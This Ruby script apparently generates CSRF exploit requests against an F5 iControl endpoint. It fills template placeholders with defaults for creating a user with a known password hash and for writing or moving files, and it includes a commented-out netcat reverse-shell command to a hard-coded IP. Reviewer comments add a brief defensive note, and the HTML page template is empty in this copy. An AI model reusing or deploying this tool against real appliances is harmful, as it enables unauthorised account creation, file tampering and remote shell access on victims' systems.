# Interactive generator for an F5 iControl request built from a template.
#
# Usage (see `usage`): ruby <script> TARGET TEMPLATE_FILE [username:password]
#   TARGET         - host whose /iControl/iControlPortal.cgi endpoint is addressed
#   TEMPLATE_FILE  - body containing %%%NAME%%% placeholders, filled in
#                    interactively from stdin (defaults in DEFAULTS)
#   username:password (optional) - when given, the filled-in body is POSTed
#                    directly over HTTPS with an Authorization header; when
#                    absent, the script emits the page held in the %{ } literal
#                    at the bottom, which per the author's own stderr note is
#                    the CSRF variant that relies on a browser session that is
#                    already authenticated to TARGET.
#
# Defensive note: the unauthenticated variant presumably only succeeds if the
# endpoint accepts state-changing requests without an anti-CSRF token; a
# text/xml POST to iControlPortal.cgi arriving with a foreign Referer/Origin
# is the observable artefact on the receiving side.
require 'httparty'
require 'base64'

# Print the command-line synopsis to stderr and terminate the process.
# `exit` never returns, so `$stderr.puts usage()` below never reaches its puts.
def usage()
  $stderr.puts "ruby #{ $0 } [username:password]"
  exit
end

TARGET = ARGV[0] || usage()
TARGET_URL = "https://#{ TARGET }/iControl/iControlPortal.cgi"
TEMPLATE_FILE = ARGV[1] || usage()

begin
  TEMPLATE = File.read(TEMPLATE_FILE)
rescue StandardError => e
  # Every read failure (not only a missing file) is reported as "File not
  # found"; the captured exception `e` is not used.
  $stderr.puts "File not found: #{ TEMPLATE_FILE }"
  $stderr.puts usage()
end

# Optional third argument; its presence selects the direct-POST path below.
ACCOUNT = ARGV[2]
if ACCOUNT
  $stderr.puts "NOTE: You've provided a username and password, which means this is going"
  $stderr.puts "to authenticate, and therefore isn't an exploit"
  $stderr.puts
  $stderr.puts "Don't enter a username:password if you want to generate a CSRF exploit!"
end

# Set up some defaults
# Keyed by the bare placeholder name (the %%% delimiters stripped), used when
# the operator presses Enter without typing a value.
DEFAULTS = {
  'FILENAME' => '/tmp/csrfdemo.txt',
  'BASE64FILEDATA' => 'SGVsbG8gd29ybGQh',
  'USERNAME' => 'rontest',
  'FULLNAME' => 'Ron Test',
  'CRYPTSHA512HASH' => '$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0', # "Password1"
  'FROM_FILENAME' => '/tmp/file1',
  'TO_FILENAME' => '/tmp/file2',
}
#COMMAND = "nc -e /bin/bash 10.0.0.146 4444 2>&1 > /dev/null &"
# DELAY is not referenced anywhere in the visible code; presumably consumed by
# the page template in the %{ } literal below — confirm against the full file.
DELAY = 1000

# Fill in the template
# Each %%%NAME%%% placeholder is replaced by a value read from stdin, falling
# back to DEFAULTS[NAME] on empty input or EOF. A placeholder with no default
# and no input yields nil, which gsub substitutes as an empty string.
REQUEST = TEMPLATE.gsub(/%%%[a-zA-Z0-9_]+%%%/) do |var|
  var.gsub!(/%/, '')   # strip the delimiters in place to get the bare name
  $stderr.print "Value for #{ var } [#{ DEFAULTS[var] }]: "
  $stderr.flush
  val = $stdin.gets&.chomp   # gets returns nil at EOF, hence the safe navigation
  if !val || val.length == 0
    val = DEFAULTS[var]
  end
  val
end

if ACCOUNT
  $stderr.puts "Sending the following payload directly to #{ TARGET }..."
  $stderr.puts
  $stderr.puts REQUEST
  # verify: false disables TLS certificate validation, so the credentials
  # placed in the Authorization header are sent to whatever answers at TARGET.
  # NOTE(review): Base64::encode64 appends a trailing newline and no auth
  # scheme is prefixed to the header value; whether the endpoint tolerates
  # this cannot be confirmed from this file.
  response = HTTParty.post(
    TARGET_URL,
    verify: false,
    headers: {
      authorization: Base64::encode64(ACCOUNT),
      'content-type': 'text/xml',
    },
    body: REQUEST
  )
  $stderr.puts
  $stderr.puts "Response:"
  $stderr.puts response
  $stderr.puts
  $stderr.puts '---'
  # A response body containing "error_string" is treated as failure; $1 is
  # the captured remainder of that line.
  if response.body =~ /(error_string.*)/
    $stderr.puts "Something went wrong:"
    $stderr.puts
    $stderr.puts $1
    exit 1
  end
else
  # No credentials: write the page to stdout. In this copy of the file the
  # %{ } literal's body is only a newline — the template content appears to
  # have been lost in extraction; confirm against the original.
  puts %{
}
end